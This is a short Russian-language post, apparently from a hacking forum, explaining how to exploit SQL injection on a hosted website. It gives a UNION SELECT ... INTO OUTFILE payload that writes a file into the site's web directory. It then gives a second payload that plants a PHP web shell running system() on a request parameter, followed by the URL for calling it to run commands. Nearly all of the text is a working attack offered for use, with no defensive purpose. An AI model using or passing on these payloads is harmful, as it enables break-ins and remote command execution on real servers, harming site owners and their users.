короче если сделаешь так
union+select+version()+into+outfile+"/hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/version.txt"+--+
если есть права на запись , если нет ищи другие папки
то в вебе можешь вызвать site.com/version.txt и все
а вместо этого файла можешь залить полноценный шелл ....
======
допустим название твоего сайта XXXL.com
тогда делаем так
+and+1=0+Union+Select+NULL,NULL,NULL,NULL"<? system($_REQUEST['cmd']); ?>",NULL,NULL+INTO+OUTFILE "/hermes/bosweb/web292/b2929/XXXL.com/public_html/XXXL.com/shell.php"
после вызовем
www.XXXL.com/shell.php?cmd=dir или ls смотря какая ОС